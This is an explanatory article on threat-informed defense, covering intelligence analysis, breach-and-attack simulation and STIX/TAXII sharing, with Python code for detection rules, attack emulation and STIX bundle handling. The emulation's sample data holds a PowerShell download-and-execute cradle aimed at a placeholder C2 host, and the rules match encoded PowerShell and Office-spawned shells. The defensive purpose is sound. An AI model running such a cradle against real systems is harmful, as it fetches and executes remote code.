Threat-Informed Defense
Threat-informed defense is a proactive approach to cyber security that combines three elements into an evolving feedback loop for your security team:
Cyber threat intelligence analysis
Defensive engagement of the threat
Focused sharing and collaboration
First: Cyber Threat Intelligence Analysis
A threat-informed defense begins with being threat-informed, and being informed requires threat intelligence. From that point you are able to understand who is likely to attack you and how they are likely to do it. That understanding is the basis for your defenses.
Cyber threat intelligence analysis, then, takes existing intelligence data such as adversary TTPs, malware hashes, or domain names and applies human analysis to harden cyber defenses. This improves your ability to anticipate, prevent, detect, and respond to cyber attacks. Keep in mind that atomic indicators like hashes and domains are cheap for an adversary to change, so the durable value is in the behavioral patterns (the TTPs) that those indicators point to.
Let's take CRITs as an example of what goes into cyber threat intelligence analysis.
MITRE CRITS
CRITs (Collaborative Research Into Threats) is a free, open-source tool designed for analysts and security professionals working on threat defense. Its main goal is to offer an adaptable and open platform for analyzing and collaborating on threat data.
It does a handful of things that assist with intelligence analysis, such as:
Collecting and archiving attack artifacts
Associating artifacts with stages of the cyber attack lifecycle
Conducting malware reverse engineering
Tracking environmental influences
Connecting all of this together to shape and prioritize defenses and react to incidents
We used CRITs here as an example because it gives a good illustration of the features cyber threat intelligence analysis relies on. (For more info about CRITs, see the project's own documentation.)
Moving forward to the second element:
Defensive Engagement of the Threat
Defensive engagement of the threat takes what you've learned from intelligence analysis and uses it to look for indicators of a pending, active, or successful cyber attack.
Breach and Attack Simulation (BAS) tools fit in well here because they take the behavioral models uncovered during intel analysis and use them to automate testing and reporting on what those behavior patterns look like in your enterprise. Run in a controlled way, the emulations show you which behaviors your telemetry and detections actually catch and which they miss.
These simulation results feed back into your threat intelligence analysis and into the next element we're going to talk about: focused sharing and collaboration.
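As an added example (not code from the original page, nor a feature of CRITs or of any BAS product), here is a minimal sketch of that engagement loop in Python: two behavioral models from intel analysis written as detection rules over process-creation telemetry, a benign baseline, and BAS-style emulation that produces the telemetry a real attack would leave without executing anything. The ATT&CK ID T1059.001 is a real technique identifier; the rules, hosts, paths and events are constructed for illustration.

```python
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (Sysmon event 1 style fields); all events here are constructed."""
    host: str
    image: str
    parent_image: str
    command_line: str


def basename(path):
    """Normalise a Windows or POSIX path to its lower-cased file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# --- Behavioural models handed over from intel analysis -----------------------
# The ATT&CK ID below is a real technique identifier; mapping these two
# behaviours to rules is this example's assumption, not something the page states.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe")


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of a UTF-16LE script; return the script or None."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def rule_t1059_001_encoded_powershell(ev):
    """T1059.001: PowerShell started with an encoded command line."""
    if basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return None
    m = ENCODED_FLAG.search(ev.command_line)
    if m is None:
        return None
    return {"decoded": decode_encoded_command(m.group(1))}


def rule_office_spawns_shell(ev):
    """An Office application spawning a shell, typical of macro-based initial access."""
    if basename(ev.parent_image) in OFFICE_APPS and basename(ev.image) in SHELLS:
        return {"parent": basename(ev.parent_image), "child": basename(ev.image)}
    return None


RULES = {
    "T1059.001-encoded-powershell": rule_t1059_001_encoded_powershell,
    "office-spawns-shell": rule_office_spawns_shell,
}


def run_rules(events):
    """Return (rule name, host, context) for every event that a rule matches."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            ctx = rule(ev)
            if ctx is not None:
                hits.append((name, ev.host, ctx))
    return hits


# --- BAS-style engagement: emulate the behaviour as telemetry, execute nothing ---
def emulate_encoded_powershell(host, script):
    """Build the event a real '-enc' launch would produce, without running PowerShell."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return ProcessEvent(host, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                        r"C:\Windows\explorer.exe", f"powershell.exe -nop -w hidden -enc {b64}")


def emulate_office_macro(host):
    """Build the event a Word macro launching cmd.exe would produce."""
    return ProcessEvent(host, r"C:\Windows\System32\cmd.exe",
                        r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                        'cmd.exe /c "whoami"')


def coverage(events):
    """Rules that fired versus rules that stayed silent; the 'missed' list is what you
    hand back to intel analysis (wrong model?) or detection engineering (telemetry gap?)."""
    fired = {name for name, _, _ in run_rules(events)}
    return {"fired": sorted(fired), "missed": sorted(set(RULES) - fired)}


# Constructed benign baseline: an admin running a script by path, Word opening Notepad.
BASELINE = [
    ProcessEvent("ws01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe", r"powershell.exe -File C:\scripts\backup.ps1"),
    ProcessEvent("ws01", r"C:\Windows\System32\notepad.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    simulated = [
        emulate_encoded_powershell("ws02", "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a.ps1')"),
        emulate_office_macro("ws03"),
    ]
    for hit in run_rules(BASELINE + simulated):
        print(hit)
    print(coverage(BASELINE + simulated))
```

The point of `coverage` is the feedback loop: a behavior the emulation produced but no rule caught is either a gap in your telemetry and detections or a sign the intel model was wrong, and either way it goes back to the analysts. Real BAS platforms run the emulation on an endpoint and read the resulting events from your SIEM or EDR; here the events are synthesised directly so the block runs offline.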
Focused Sharing and Collaboration
By sharing threat actor TTPs through standards such as STIX (the data format for describing threat information) and TAXII (the transport protocol for exchanging it), the security community benefits together.
If you are part of a large organization with several security groups, information shared between those groups in a standard format can help your enterprise build a threat-informed defense.
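To make the sharing step concrete, here is an added example (not code from the original page, and not the OASIS stix2 library, which is what you would normally use in production) that builds a STIX 2.1 bundle tying the intelligence inputs mentioned earlier (a TTP plus a domain and a file hash) to an ATT&CK technique, then shows what a receiving team does with that bundle once it arrives over TAXII: validate the objects, pull out the technique IDs, and walk the relationships back to the observables. The technique ID T1059.001 is a real ATT&CK identifier; the domain and hash are constructed, and the pattern parser deliberately handles only simple equality comparisons.

```python
import json
import re
import uuid
from datetime import datetime, timezone


def stix_timestamp():
    """RFC 3339 UTC timestamp with millisecond precision, as STIX 2.1 expects."""
    dt = datetime.now(timezone.utc)
    return dt.strftime("%Y-%m-%dT%H:%M:%S.") + f"{dt.microsecond // 1000:03d}Z"


def stix_object(obj_type, **props):
    """Build an SDO/SRO with the common properties STIX 2.1 requires on every one."""
    ts = stix_timestamp()
    obj = {"type": obj_type, "spec_version": "2.1", "id": f"{obj_type}--{uuid.uuid4()}",
           "created": ts, "modified": ts}
    obj.update(props)
    return obj


def make_bundle(technique_id, technique_name, observables):
    """Package one ATT&CK technique and the atomic observables that indicate it.
    observables: list of (STIX object path, value), e.g. ("domain-name:value", "c2.example.invalid")."""
    attack_pattern = stix_object(
        "attack-pattern", name=technique_name,
        external_references=[{"source_name": "mitre-attack", "external_id": technique_id}])
    pattern = " OR ".join(f"[{path} = '{value}']" for path, value in observables)
    indicator = stix_object(
        "indicator", name=f"Observables for {technique_id}", indicator_types=["malicious-activity"],
        pattern=pattern, pattern_type="stix", valid_from=stix_timestamp())
    relationship = stix_object(
        "relationship", relationship_type="indicates",
        source_ref=indicator["id"], target_ref=attack_pattern["id"])
    return {"type": "bundle", "id": f"bundle--{uuid.uuid4()}",
            "objects": [attack_pattern, indicator, relationship]}


def to_json(bundle):
    """Serialise the bundle the way it would travel in a TAXII envelope."""
    return json.dumps(bundle, indent=2)


# --- Consumer side: what a peer does with a bundle pulled from a TAXII collection ---
ID_RE = re.compile(r"^([a-z0-9-]+)--[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$")
# Only the simple "[path = 'value']" comparisons joined by OR are handled here; full STIX
# patterning (AND, FOLLOWEDBY, WITHIN, other operators) needs a real parser such as stix2-patterns.
COMPARISON_RE = re.compile(r"\[\s*([A-Za-z0-9_.:'-]+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*\]")


def load_bundle(text):
    """Parse a received bundle, rejecting objects whose id does not match their type
    or whose spec_version is not 2.1. Returns {id: object}."""
    data = json.loads(text)
    if data.get("type") != "bundle":
        raise ValueError("not a STIX bundle")
    objects = {}
    for obj in data.get("objects", []):
        m = ID_RE.match(obj.get("id", ""))
        if m is None or m.group(1) != obj.get("type"):
            raise ValueError(f"malformed id on object: {obj.get('id')!r}")
        if obj.get("spec_version", "2.1") != "2.1":  # property is optional on cyber-observable objects
            raise ValueError(f"unsupported spec_version on {obj['id']}")
        objects[obj["id"]] = obj
    return objects


def attack_ids(objects):
    """Every ATT&CK technique ID referenced by an attack-pattern in the bundle."""
    ids = set()
    for obj in objects.values():
        if obj["type"] == "attack-pattern":
            for ref in obj.get("external_references", []):
                if ref.get("source_name") == "mitre-attack" and "external_id" in ref:
                    ids.add(ref["external_id"])
    return sorted(ids)


def observables_for(objects, technique_id):
    """Walk 'indicates' relationships from indicators to the attack-pattern carrying
    technique_id and return its (path, value) observables, ready for a blocklist or rule."""
    targets = {obj["id"] for obj in objects.values() if obj["type"] == "attack-pattern"
               and any(r.get("external_id") == technique_id for r in obj.get("external_references", []))}
    found = []
    for obj in objects.values():
        if obj["type"] != "relationship" or obj.get("relationship_type") != "indicates":
            continue
        if obj.get("target_ref") not in targets:
            continue
        indicator = objects.get(obj.get("source_ref"))
        if indicator and indicator["type"] == "indicator" and indicator.get("pattern_type") == "stix":
            found.extend(COMPARISON_RE.findall(indicator["pattern"]))
    return found


if __name__ == "__main__":
    # Constructed sample: a real ATT&CK ID (PowerShell) with made-up observables.
    bundle = make_bundle("T1059.001", "Command and Scripting Interpreter: PowerShell",
                         [("domain-name:value", "c2.example.invalid"),
                          ("file:hashes.'SHA-256'", "ab" * 32)])
    received = load_bundle(to_json(bundle))
    print(attack_ids(received), observables_for(received, "T1059.001"))
```

The validation in `load_bundle` is the part worth keeping even if you swap in the stix2 library: a bundle from a sharing partner is untrusted input, so check that each object's id prefix agrees with its type before you let it drive anything in your environment, and never feed extracted observables straight into a blocking control without the analyst review that the first element of the loop is about.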
Groups like MITRE's Center for Threat-Informed Defense (CTID) bring together sophisticated security teams from leading organizations around the world to expand the global understanding of adversary behaviors. They accomplish this by creating focus, collaboration, and coordination to accelerate innovation in threat-informed defense, building on the MITRE ATT&CK framework.